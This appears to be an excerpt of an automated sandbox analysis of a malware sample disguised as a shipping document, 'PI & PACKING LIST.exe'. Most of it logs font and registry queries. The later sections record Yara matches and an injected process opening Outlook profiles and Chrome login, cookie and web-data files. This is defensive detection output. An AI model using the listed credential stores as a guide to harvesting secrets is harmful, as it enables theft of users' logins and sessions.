Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY